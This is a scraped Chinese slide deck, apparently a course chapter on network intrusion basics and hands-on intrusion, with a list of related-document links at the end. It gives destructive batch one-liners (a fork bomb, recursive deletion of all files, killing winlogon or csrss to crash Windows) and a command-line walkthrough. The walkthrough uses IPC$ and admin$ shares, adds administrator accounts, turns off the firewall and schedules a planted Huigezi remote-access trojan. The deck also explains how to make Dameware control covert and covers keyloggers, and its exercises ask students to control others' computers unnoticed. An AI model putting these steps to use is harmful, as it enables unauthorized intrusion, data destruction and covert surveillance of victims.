当前位置:首页 >> IT/计算机 >>

网络安全攻防技术教程


第2章 章

网络入侵基础知识、 网络入侵基础知识、 入侵实战

李冰川 QQ:594520163 Email:aizhihuo218@163.com

章节目标
常用的DOS命令 命令 常用的 常用的入侵命令 Hack实战一:命令行下的入侵 实战一: 实战一 Hack实战二:图形界面的入侵 实战二: 实战二 流行远程控制木马的使用方法 键盘记录程序的使用方法

Page 2

常用DOS命令 常用 命令1 命令
Cd 切换目录 Dir 列出所有文件信息 Del 删除文件 Md 创建目录 Rd删除目录 删除目录 Copy 复制 Xcopy 复制文件和文件夹 Cls 清屏 Attrib 修改文件、文件夹属性 修改文件、 Date、Time显示日期、时间 显示日期、 、 显示日期
Page 3

常用DOS命令 常用 命令2 命令
Path 系统路径 Set 显示、设置系统信息 显示、 Ren(Rename)重命名 重命名 Subst 虚拟磁盘 Ver 显示操作系统版本 Help 帮助 /? 显示某条命令的帮助

Page 4

非主流DOS命令 非主流 命令1 命令
1.重复执行某条命令直至死机的批处理代码: 重复执行某条命令直至死机的批处理代码: 重复执行某条命令直至死机的批处理代码 start cmd %0 2.复制一个文件的磁盘的每个子文件夹当中: 复制一个文件的磁盘的每个子文件夹当中: 复制一个文件的磁盘的每个子文件夹当中 for /r /d %a in (*) do copy test.txt "%a" /y 3.不停地执行同一条命令: 不停地执行同一条命令: 不停地执行同一条命令 for /l %a in (1,0,2) do net send 192.168.1.1 "炸弹来了! 炸弹来了! 炸弹来了 " 4.死机 蓝屏 死机,蓝屏 死机 ntsd -c q -pn winlogon.exe ntsd -c q -pn csrss.exe
Page 5

非主流DOS命令 非主流 命令2 命令
5.删除磁盘所有文件: 删除磁盘所有文件: 删除磁盘所有文件 del * /a /s /q /f 6.创建名字为空的文件夹: 创建名字为空的文件夹: 创建名字为空的文件夹 md (按住 键,在小键盘上按 按住Alt键 在小键盘上按2,5,5,然后松开 然后松开Alt,回车 回车) 按住 然后松开 回车 7.创建无法删除的特殊名字文件夹: 创建无法删除的特殊名字文件夹: 创建无法删除的特殊名字文件夹 md \\.\c:\con md \\.\c:\aux 8.创建无法双击打开无法删除的另类文件夹: 创建无法双击打开无法删除的另类文件夹: 创建无法双击打开无法删除的另类文件夹 md test..\ rd test..\ /s /d
Page 6

常用入侵命令1 常用入侵命令
net user 用户名 密码 /add (建立用户 建立用户) 建立用户 net localgroup administrators 用户名 密码 /add (将用 将用 户加到管理员,使其拥有管理权限) 户加到管理员,使其拥有管理权限 net user guest /active:Yes (激活 激活guest用户 用户) 激活 用户 net user guest 12345 (修改 修改guest密码为 密码为12345) 修改 密码为 net user (查看账号属性 查看账号属性) 查看账号属性 net use \\ip\ipc$ “” /user (建立空 建立空IPC连接 连接) 建立空 连接 net use \\ip\ipc$ “密码 /user:“用户名 (建立 密码” 用户名” 建立IPC非空连 密码 用户名 建立 非空连 非空链接就是需要帐户和密码) 接,非空链接就是需要帐户和密码 net use \\ip\ipc$ /del (删除 删除IPC空连接 空连接) 删除 空连接 net use z: \\127.0.0.1\c$(映射目标主机磁盘 盘到本地磁 映射目标主机磁盘c盘到本地磁 映射目标主机磁盘 盘Z盘) 盘
Page 7

常用入侵命令2 常用入侵命令
net start (查看开启了哪些服务 查看开启了哪些服务) 查看开启了哪些服务 net start 服务名 (开启服务 开启服务) 开启服务 net time \\目标 (查看对方时间 目标IP 查看对方时间 查看对方时间) 目标 net view (查看局域网中开启了哪些共享 查看局域网中开启了哪些共享) 查看局域网中开启了哪些共享 net share (查看本地开启的哪些共享 查看本地开启的哪些共享) 查看本地开启的哪些共享 net share C$/del (删除 盘默认共享 删除C盘默认共享 删除 盘默认共享) netstat -an (查看计算机开放了哪些端口 查看计算机开放了哪些端口) 查看计算机开放了哪些端口 Copy xx.exe\\ip\admin$\System32 (将当前 将当前 xx.exe复制到对方 复制到对方Admin$共享的 共享的System32目录 复制到对方 共享的 目录 内)
Page 8

常用入侵命令3 常用入侵命令
sc config tlnesvr start= auto(修改 修改telnet服务的 修改 服务的 启动方式为自动, 前面有一个空格) 启动方式为自动,auto前面有一个空格 前面有一个空格 net stop sharedaccess(关闭系统自带的防火墙 关闭系统自带的防火墙) 关闭系统自带的防火墙 net send IP 消息 利用 消息(利用 利用messenger服务向目标 服务向目标IP 服务向目标 发送消息) 发送消息 ntsd -c q -pn winlogon.exe(蓝屏重启 蓝屏重启) 蓝屏重启 ntsd -c q -pn csrss.exe(死机 死机) 死机 tasklist(查看进程 查看进程) 查看进程 taskkill(结束进程 结束进程) 结束进程
Page 9

实战:纯DOS命令入侵 实战: 命令入侵
net use \\192.168.2.20\ipc$ “123” /user:”administrator” net time \\192.168.2.20 Copy c:\server.exe \\192.168.2.20\admin$\svchost.exe At \\192.168.2.20 12:00 start c:\windows\svchost.exe

这样,对方就中了灰鸽子服务端了。 这样,对方就中了灰鸽子服务端了。

Page 10

几个小例子
开启禁用的telnet服务: 服务: 开启禁用的 服务 sc config tlntsvr start= auto(auto前有空格 前有空格) 前有空格 开启3389远程终端 开启 远程终端 reg add 开启C盘默认共享 开启 盘默认共享 net share c$=c: 开启计划任务服务( 命令需要这一服务 命令需要这一服务) 开启计划任务服务(at命令需要这一服务) net start schedule 开启远程注册表(Remote Registry)服务 开启远程注册表 服务 net start remoteregistry
Page 11

图形界面入侵
一、计算机管理 操作菜单 连接到另一台计算机 二、注册表编辑器 文件菜单 连接网络注册表 三、第三方工具比如Dameware、Pcanywhere 第三方工具比如 、
Dameware的使用方 的使用方 法
Page 12

Dameware的隐藏 的隐藏
控制对方, 用Dameware控制对方,要做到悄无声息,需要注 控制对方 要做到悄无声息, 意以下几点: 意以下几点: 激活软件,输入注册码注册软件; 点帮助菜单 激活软件,输入注册码注册软件; 在远程连接对话框上单击“设置” 勾选: 在远程连接对话框上单击“设置”,勾选: 查看模式” 显示远程鼠标指针” “查看模式”和“显示远程鼠标指针”; 切换到“安装选项”选项卡,勾选上“ 切换到“安装选项”选项卡,勾选上“复制配置文 然后点“编辑” 件”然后点“编辑”: 附加设置”选项卡上“允许托盘图标” 把“附加设置”选项卡上“允许托盘图标”勾掉 再把“通知对话”选项卡上“连接时通知”勾掉。 再把“通知对话”选项卡上“连接时通知”勾掉。
Page 13

XP默认不能远程控制的原因 默认不能远程控制的原因
在运行中输入命令secpol.msc打开安全策略 打开安全策略 在运行中输入命令 展开“本地策略” 安全选项 安全选项” 红色表示默认选 展开“本地策略” “安全选项” (红色表示默认选 项)
“安全选项:本地账户的共享和安全模式” 安全选项:本地账户的共享和安全模式” 安全选项
? 经典,表示在远程可以拥有管理员权限 经典, ? 仅来宾,表示在远程只能拥有guest权限 仅来宾,表示在远程只能拥有 权限

“账户:使用空白密码的账户只允许进行控制台登录” 账户:使用空白密码的账户只允许进行控制台登录”
? 启用,账户密码为空则不允许远程访问 启用, ? 禁用,账户密码为空也允许远程访问 禁用,

所以,要想控制系统为XP的计算机 的计算机, 所以,要想控制系统为 的计算机,必须考虑对 方安全策略的设置 安全策略的设置不影响利用木马进行控制
Page 14

灰鸽子
以华夏灰鸽子2009为例,注意事项: 为例,注意事项: 以华夏灰鸽子 为例
IP地址栏一定要填写自己的 地址,而且不要忘了加 地址栏一定要填写自己的IP地址 地址栏一定要填写自己的 地址, 上冒号和端口号

Page 15

PcShare
使用方法和灰鸽子类似

Page 16

键盘记录
以“keyghost”和“简单键盘记录程序”为例 和 简单键盘记录程序”

Page 17

实验任务
练习前面PPT中的 中的DOS命令 练习前面 中的 命令 开一台2003虚拟机,利用命令入侵,以能够 虚拟机, 开一台 虚拟机 利用命令入侵, telnet到对方电脑为入侵成功的标志 到对方电脑为入侵成功的标志 到对方电脑 开一台2003虚拟机,利用图形界面入侵,以能够 虚拟机, 开一台 虚拟机 利用图形界面入侵, 控制对方桌面为入侵成功的标志 控制对方桌面为入侵成功的标志 使用远控软件Dameware控制别人电脑 使用远控软件 控制别人电脑 要求:悄无声息,不能被对方发现) (要求:悄无声息,不能被对方发现) 利用灰鸽子控制别人电脑
Page 18


相关文章:
网络安全攻防技术教程_图文.ppt
网络安全攻防技术教程 - 第 2章 网络入侵基础知识、 入侵实战 李冰川 QQ:
网络安全与攻防教学大纲.doc
网络安全与攻防教学大纲 - 网络安全技术教学大纲,比较全面,适合高职学院... 网络安全与攻防教学大纲_院校资料_高等教育_...《网络攻防技术实训教程》,杨育斌主编,清华...
网络安全攻防技术教程_图文.ppt
网络安全攻防技术教程_互联网_IT/计算机_专业资料。第2章 网络入侵基础知识、
网络安全攻防技术教程_图文.ppt
网络安全攻防技术教程 - 第2章 章 网络入侵基础知识、 网络入侵基础知识、 入
网络安全基础教程第6章 网络入侵与攻击技术_图文.ppt
网络安全基础教程第6章 网络入侵与攻击技术_互联网_IT/计算机_专业资料。主要
网络安全基础教程_图文.ppt
网络安全基础教程 - 网络安全技术基础 Network Security Technology Essentials Training Course 课程简介 网络安全技术基础 Networ...
2网络安全中的攻防技术_图文.ppt
2网络安全中的攻防技术 - 网络通信安全管理员培训 第二部分 网络安全中的攻防技术 2.1 网络攻击技术 2.1.1 概述 2.1.2 网络攻击技术原理 2.1.3 恶意软件...
《网络攻防技术》课程教学设计与研究.doc
网络攻防技术》课程教学设计与研究 - 龙源期刊网 http://www.qikan.com.cn 《网络攻防技术》课程教学设计与研究 作者:王艳芳 来源:《电脑知识与技术》2016 年...
信息安全与网络攻防技术培训班免费学习_网络安全_教学....doc
视频教程,中培教育全套教学,在线学习网络安全课程,信息安全与网络攻防技术培训班视
网络安全培训课程_图文.ppt
00 2003 网络安全的背景黑客攻击技术与网络病毒日趋融合 网络安全的背景攻击者...网络工程师培训教程-网络... 20页 免费 系统安全部内部培训-网络... 35页...
网络安全PPT讲义_图文.ppt
网络安全PPT讲义 - 2015-3-11 内容 1.网络安全知识/常识 2.网络漏洞和网络攻击技术介绍 3.网络安全防御技术-产品 4.网络安全策略-网络安全服务 1 2015-3-1....
计算机网络安全教程课后答案及考试试卷_图文.doc
计算机网络安全教程课后答案及考试试卷 - 一、名词解释 黑客(P103) 木马(
网络安全与攻防课程标准.doc
网络安全攻防课程标准 - 这是最适合大学网络安全专业的课程标准... 《网络安全攻防实战》是计算机网络技术专业必修的专业课,对学生职业能力 培养和职业素养养成起...
最新黑客攻防从入门到精通_网络安全_教学视频大全.doc
任何人视频教程,书中客全套教学,在线学习网络安全课程,最新黑客攻防从入门到精通视
网络安全技术课程学习体会.doc
网络安全技术课程学习体会 - 课程学习体会 通过学习网络安全技术这门课, 我了解
网络安全攻防实践PPT_图文.pdf
网络安全攻防实践PPT - 提纲 v v v v 发生在我们周围的安全事件. .
7天精通黑客攻防_网络安全_教学视频大全.doc
任何人网络安全攻防视频教程,彩风课堂全套教学,在线学习网络安全课程,7天精通黑客
信息安全 实验三 网络攻防技术_图文.doc
信息安全 实验三 网络攻防技术 - 实验三 实验 3-1 帐号口令破解 一 实验目的 网络攻防技术 通过密码破解工具的使用,了解帐号的安全性,掌握安全口令的设置原则,以...
网络安全技术介绍._图文.ppt
网络安全技术介绍. - 网络安全教程 目录 网络安全体系结构 网络安全攻击 防火墙技术 入侵检测技术 网络安全策略 网络安全案例 参考资料 2 网络安全体系结构 网络安全...
1网络安全攻防技术_图文.ppt
1网络安全攻防技术 - 银河网盾工程 网络安全攻防技术 目 录 第一节 网络安全
更多相关标签: